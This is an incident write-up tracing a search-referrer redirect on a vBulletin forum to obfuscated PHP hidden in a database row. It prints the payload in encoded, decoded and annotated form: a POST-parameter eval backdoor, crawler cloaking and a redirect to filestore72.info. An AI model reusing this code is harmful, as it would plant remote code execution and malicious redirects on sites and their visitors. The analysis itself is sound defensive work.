
vBulletin infection case study: conditional redirect to filestore72.info

Problem

The site redirects visitors to filestore72.info, but only when they arrive from a Google search result.

Investigation

  1. Open the site from a Google search result and reproduce the redirect.
  2. The browser console shows the redirect is issued by one of the scripts the page loads — scripts that look like ordinary vBulletin assets:
    <script type="text/javascript" src="http://example.org/clientscript/vbulletin-core.js?v=425"></script>
    <script type="text/javascript" src="http://example.org/misc.php?v=425&js=js"></script>
    ...

    The script body returned by the server was not the expected JavaScript but simply:

    document.location='http://filestore72.info/download.php'
    

     

  3. Repeat the request with Fiddler2 or any similar HTTP debugging proxy: the same infected content comes back every time, so the injection is server-side and reproducible, not a browser-side artifact.
  4. The code that emits this output is “includes/class_core.php” at line 4684, where vBulletin evaluates its compiled templates:
    eval($template_code);
    

     

  5. Add a temporary debug line immediately before that eval, gated on a query parameter, to dump the template code being evaluated (remove it as soon as you are done — it exposes template source to anyone who guesses the parameter name):
    if (isset($_GET['test'])) echo "<pre>$template_code</pre>";
    

     

  6. Repeat the request in Fiddler2 with ?test appended and inspect the dumped template; its head section contains:
    <script type="text/javascript" src="' . $vboptions['bburl'] . '/clientscript/vbulletin-core.js?v=' . $vboptions['simpleversion'] . '"></script>
    ' . $template_hook['headinclude_javascript'] . '
    

     

  7. The variable “$template_hook['headinclude_javascript']” stands out: it is the hook through which arbitrary markup reaches the page head.
  8. Search a database dump for that variable name: it is appended to inside a row of the “datastore” table. A legitimate-looking blog hook is followed by a long run of newlines that pushes the injected code out of view, after which the obfuscated payload begins:

     $template_hook[”headinclude_javascript”] .= ”<script type=”text/javascript”>PATHS.blog = “” . htmlspecialchars_uni($vbulletin->options[”vbblog_url”]) . ””;</script>”;\r\n}\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n$pt = ”babe56042d43ad843163a10c83466377”;\r\n$arrvb = ”30m%D2zm93h[,V3kRV3D>/e=>K%omJ=A+g}]*K%lEC+8zlX6m”=ogKJ[mgX6kB4jk7j<3Bq&E.VjmgX?zC)_gKJBkl=BkBk9T.jf>/eR>K&0+8=%k]>0k]T]#bL<*|8<+Or<k|X%V.4jg8~Nw8qz>/~6g7j<+g+rz.rO;gX%Xvq^+CJvzKq%E/X6k%=Bz|}&TB4jg8~Nw8qz>/~6g7j<En9jVn8Lk/>%+8=Q;gqvm.4]1K>0V/&AkC%j+g>x;|>rVK&xkK&8k]~x3″)o+CJ[1Kj]#.q^w6J7JjJ7″BV1J)q}g8JnqJ>^}wV)n%}]g7jf>/T=}/~rk]X%g|JBz.4jg8X)w%+)w%9]7)qww)=7qw+)wjJ7>86<*Bq6NwLjk89]mC=AV.VV*BqBNw~?klJ]gK8rVCXRE.kvzC%K+J?o;K=Q^CV0zKV9+J?o^/%rmC=0g._x;l%o+B_vzK8x3″)o+CJ[g._BVg&B;”8OzCJBg._BVg&O;”%jVJ?o^C+r;KJOzK=!g._xm”_AVC)]kl)Qg._xVC%o3gJBz)?o^C><V)?oz/jvm7k9>/}<^/?jVb6=>|}o;Kx]*BqRNwLjg8X)w%+)w%9]7)qww)=1n8Xw>86f>/L=}eXNn6Q>qJ=}wjJC7J4f>Ce=})q17JX^w6X77J~wNn6=>K8<kKT]*BqvN7q?#OV9;gX6Vl%Amg}]*BqoN7q?#OV9;”_]gK%j>A9j3n8Lz|>jEe+>neJ^JjJ7w6%NnOj:kr!D[|Z:Xnef>/R=+”8?V/jR>)=nqJ>”qJ>z>6rwJ)~^”)=Xn8R]g7jf>CR=>A&A;|><k/}4V/%?+n6OVCJ[V.=I;g+rkKXBmg~61O~AklT=1Oko>/+OV”&9+gq<zO6:kr!D[|Z:z|~6m”=ok89];l>8kl?]g7[]#K8<kKTokCr?N|;=>B[jVl>8zC&%VC%o#n_0k/q<zK_A”BVAm”8?zCJK+g>Am”=o>86o>B+rzgLfm]T=m]TONv?0kKXBmg~6NOkfm”;R+”8?V/jR>)=bn6=#7wJz>C_VE7%fm”;R>Cel>l%AkKJ6E.q^q6Jw”BVK>86<>O;RmgXA+g}R>)=/qJqz>K<A>86<E7;lE.)%zg~6374jg6XNn6Q>qJ9j;86<E7%fm”;R>/}=N7qREgQ<+O4j3O%A+gqvzK=!m”wR>C[9>KJo>B&6m”8%E.j!TA;?TbL<*BqQNgX8;]X6kOrQ+bwR>C4<#bL9*.jfk/><z]}R1lq0;|JQ+”_6#l&0;K)6m”=oN7VRV/q?*Ox0+l%9+gX6z|>%XA1om”_lzB=jz|VozC=r+._?m/L:kr!D[fZ:m”}=3BqQ^7kOEnQ=+gr<VbQ=m”;RE.ejV7jl>OqBEgQ<+O4j37%f>eVTn6>~n)Xz>|q%zg~9;gq%gKr0zK9]gJ9]mCJr+C%o;K&8+CJ^ml)K;gXvkl%?V.VV#v6jmvQ=+”&A+g9jq6&N}j)Tw89]k|q_zCw]gJ9];|XA>86oN7qI*|8=^}ZZ`”;\r\n$ajx = 
”:eMx(UPoYL}O`I5&@|=XQ^sp4~1Tt*./+2>9j”7AmgKv#rZy8!Vwd[kqicnS6NhzD-a$R;ulF3,BG{?JWfCEb%]H0)_<”;\r\n$ajx2 = ”.E[8/~?u#AQi;q-x|39Ntf&<gBIM,OCHZ@JskWSzaX2jLh)+1rdU`4cR:=T>0P6b($”%oY!m{e_y}]wV*7GKDln^vF5p”;\r\n$baseline = ”%s%”.substr($arrvb, 733, 1);\r\n$gpu = preg_replace($baseline, strtr($arrvb, $ajx, $ajx2), ”vbseo”);\r\n

  9. Simulate the decoder above (strtr() with two substitution alphabets) and print its result. The single character pulled from offset 733 of $arrvb is presumably the “e” modifier: with it preg_replace() evaluates the replacement string as PHP (the PCRE /e modifier, removed in PHP 7), which is how the decoded code below gets executed rather than merely returned:

    eval(@base64_decode(JHE9J2luaV9zZXQnO2lmKGZ1bmN0aW9uX2V4aXN0cygkcSkpeyRxKCdkaXNwbGF5X2Vycm9ycycsMCk7JHEoJ2xvZ19lcnJvcnMnLDApO31pZihpc3NldCgkX1BPU1RbJHB0XSkpZXZhbChiYXNlNjRfZGVjb2RlKHN0cl9yb3QxMygkX1BPU1RbJHB0XSkpKTskdT1AcHJlZ19tYXRjaCgnI2JvdHxzcGlkZXJ8Y3Jhd2x8c2x1cnB8eWFuZGV4I2knLCRfU0VSVkVSWydIVFRQX1VTRVJfQUdFTlQnXSk7JHM9QHBhcnNlX3VybCgkX1NFUlZFUlsnSFRUUF9SRUZFUkVSJ10pOyR0PUAkc1snaG9zdCddOyRyPUBwcmVnX21hdGNoKCcjbGl2ZVwuY29tfGdvb2dsZVwufHlhaG9vXC58YmluZy5jb218eWFuZGV4XC5ydXxyYW1ibGVyXC5ydXxiYWlkdVwufGZhY2Vib29rXC58aW5zdGFncmFtXC58dGlueXVybFwufGJpdFwubHkjaScsJHQpfHwkdD09J3QuY28nOyRoPUAkX1NFUlZFUlsnSFRUUF9IT1NUJ107JHA9QENPT0tJRV9QUkVGSVg7JGE9QFRISVNfU0NSSVBUPT09J21pc2MnOyRjPSRwLidsYXN0dmlzaXQnOyRuPSRwLidsYW5nX2lkJzskeT1Ab3JkKEZJTEVfVkVSU0lPTik.chr(43).NTE7JHo9ZW1wdHkoJF9TRVJWRVJbJ0hUVFBfWF9NT1onXSk7JGo9JzxzY3JpcHQgdHlwZT0idGV4dC9qYXZhc2NyaXB0IiBzcmM9IicuJHZidWxsZXRpbi0.chr(43).b3B0aW9uc1snYmJ1cmwnXS4nL21pc2MucGhwP3Y9Jy4kdmJ1bGxldGluLT5vcHRpb25zWydzaW1wbGV2ZXJzaW9uJ10uJyZhbXA7anM9anMiPjwvc2NyaXB0Pic7aWYoZW1wdHkoJF9DT09LSUVbJG5dKSl7aWYoJGEmJmlzc2V0KCRfR0VUWyd2J10pJiYoaXNzZXQoJF9HRVRbJ2pzJ10pKSYmKCFlbXB0eSgkX0NPT0tJRVskY10pKSl7aWYoJHQ9PSRoKXtpZigkeilzZXRjb29raWUoJG4sJ2VuJyx0aW1lKCkrMzYwMDApOyRtPXN1YnN0cihtZDUoJGgpLDAsOCk7cHJpbnQoImRvY3VtZW50LmxvY2F0aW9uPSdodHRwOi8vZmlsZXN0b3JlNzIuaW5mby9kb3dubG9hZC5waHA.chr(47).aWQ9eyRtfSciKTt9ZXhpdDt9aWYoKCEkdSkmJiRyKXtpZigkeSl7JEdMT0JBTFNbJ3RlbXBsYXRlX2hvb2snXVsnaGVhZGluY2x1ZGVfamF2YXNjcmlwdCddLj0kajt9ZWxzZXskR0xPQkFMU1snc3R5bGUnXVsnY3NzJ10uPSRqO319fQ));

  10. Decoding the base64 string yields this one-liner (some characters were mangled when the page was extracted; the beautified listing below is easier to read):

    $q=’ini_set’;if(function_exists($q)){$q(‘display_errors’,0);$q(‘log_errors’,0);}if(isset($_POST[$pt]))eval(base64_decode(str_rot13($_POST[$pt])));$u=@preg_match(‘#bot|spider|crawl|slurp|yandex#i’,$_SERVER[‘HTTP_USER_AGENT’]);$s=@parse_url($_SERVER[‘HTTP_REFERER’]);$t=@$s[‘host’];$r=@preg_match(‘#live\.com|google\.|yahoo\.|bing.com|yandex\.ru|rambler\.ru|baidu\.|facebook\.|instagram\.|tinyurl\.|bit\.ly#i’,$t)||$t==’t.co’;$h=@$_SERVER[‘HTTP_HOST’];$p=@COOKIE_PREFIX;$a=@THIS_SCRIPT===’misc’;$c=$p.’lastvisit’;$n=$p.’lang_id’;$y=@ord(FILE_VERSION)†¾751;$z=empty($_SERVER[‘HTTP_X_MOZ’]);$j='<script type=”text/javascript” src=”‘.$vbulletin-†¾7options[‘bburl’].’/misc.php?v=’.$vbulletin->options[‘simpleversion’].’&amp;js=js”></script>’;if(empty($_COOKIE[$n])){if($a&&isset($_GET[‘v’])&&(isset($_GET[‘js’]))&&(!empty($_COOKIE[$c]))){if($t==$h){if($z)setcookie($n,’en’,time()+36000);$m=substr(md5($h),0,8);print(“document.location=’http://filestore72.info/download.php†¾;id={$m}'”);}exit;}if((!$u)&&$r){if($y){$GLOBALS[‘template_hook’][‘headinclude_javascript’].=$j;}else{$GLOBALS[‘style’][‘css’].=$j;}}}

  11. Beautified code:
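    <?php
    // Cloaking/redirect payload recovered from the vBulletin "datastore" table, de-obfuscated.
    // Reproduced for analysis only — do not deploy. Three characters mangled in the extracted
    // listing have been restored: the `>` in `> 51`, the `->` before options['bburl'], and the
    // `?` in `download.php?id=` (the last one reconstructed; the redirect observed in step 2
    // showed only download.php without the id parameter).
    // Runtime context: $pt is defined by the surrounding injected code (a 32-hex-character key);
    // COOKIE_PREFIX, THIS_SCRIPT, FILE_VERSION and $vbulletin are vBulletin globals.

    // Silence PHP errors so a broken payload never surfaces in the page or in the logs.
    $q = 'ini_set';
    if (function_exists($q)) {
        $q('display_errors', 0);
        $q('log_errors', 0);
    }

    // Remote code execution backdoor: any request carrying a POST field named by $pt has its
    // value rot13- and then base64-decoded and eval()'d. This is independent of the redirect
    // logic below and gives the attacker arbitrary PHP execution on the host.
    if (isset($_POST[$pt])) {
        eval(base64_decode(str_rot13($_POST[$pt])));
    }

    // Cloaking inputs.
    $u = @preg_match('#bot|spider|crawl|slurp|yandex#i', $_SERVER['HTTP_USER_AGENT']); // crawler user agent?
    $s = @parse_url($_SERVER['HTTP_REFERER']);
    $t = @$s['host']; // referrer host
    // Referrer is a search engine or a social/link-shortener site?
    $r = @preg_match('#live\.com|google\.|yahoo\.|bing.com|yandex\.ru|rambler\.ru|baidu\.|facebook\.|instagram\.|tinyurl\.|bit\.ly#i', $t) || $t == 't.co';
    $h = @$_SERVER['HTTP_HOST'];
    $p = @COOKIE_PREFIX;
    $a = @THIS_SCRIPT === 'misc'; // are we serving misc.php, the URL the injected <script> points at?
    $c = $p . 'lastvisit';        // cookie vBulletin sets for returning visitors (name only is known here)
    $n = $p . 'lang_id';          // marker cookie this payload sets once a visitor has been redirected
    $y = @ord(FILE_VERSION) > 51; // first char of FILE_VERSION above '3' — presumably vB4+ vs vB3; confirm
    $z = empty($_SERVER['HTTP_X_MOZ']); // presumably skips Firefox prefetch requests — confirm
    // <script> tag injected into the page head. It points back at this site's own misc.php,
    // which is why the page appears to load a legitimate vBulletin asset (step 2).
    $j = '<script type="text/javascript" src="' . $vbulletin->options['bburl'] . '/misc.php?v=' . $vbulletin->options['simpleversion'] . '&amp;js=js"></script>';

    if (empty($_COOKIE[$n])) {
        // Phase 2: the browser is fetching the injected misc.php?v=..&js=js URL. The script's
        // normal output is replaced entirely (note the unconditional exit), and a returning
        // visitor whose referrer is this very site receives the JavaScript redirect.
        if ($a && isset($_GET['v']) && (isset($_GET['js'])) && (!empty($_COOKIE[$c]))) {
            if ($t == $h) {
                if ($z) setcookie($n, 'en', time() + 36000); // 36000 s = 10 h: do not redirect the same visitor again
                $m = substr(md5($h), 0, 8);                   // per-site identifier handed to the attacker's host
                print("document.location='http://filestore72.info/download.php?id={$m}'");
            }
            exit;
        }

        // Phase 1: a normal page view that arrived from a search engine/social site and does not
        // carry a crawler user agent gets the <script> tag appended to the head, via the template
        // hook ($y true) or the style CSS otherwise. Crawler user agents and direct visits never
        // see it, which is why the site looks clean when opened by hand.
        if ((!$u) && $r) {
            if ($y) {
                $GLOBALS['template_hook']['headinclude_javascript'] .= $j;
            } else {
                $GLOBALS['style']['css'] .= $j;
            }
        }
    }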
    
  12. This is the root cause of the redirect. Because the payload only fires for non-crawler visitors arriving from a search engine or social site, direct visits look clean and crawler user agents are never served it.
  13. Remove the injected PHP from the datastore row: everything from the run of “\n\n\n\n” through the closing “'vbseo");\r\n”. The row is a PHP-serialized value, so the “s:NNN:” length prefix immediately before the string must be corrected to the new byte length of the string, or unserialize() will reject the whole entry. Something like:
    s:311:"...
  14. Confirm the redirect is gone. Note that this only removes the redirect payload: the same code accepted arbitrary PHP through a POST parameter (the eval on $_POST[$pt]), so the attacker had remote code execution and may have left other changes. Review the remaining datastore rows, plugins, templates and files on disk for modifications, rotate the admin and database credentials, and establish how the code was planted in the first place — this write-up does not determine the entry vector.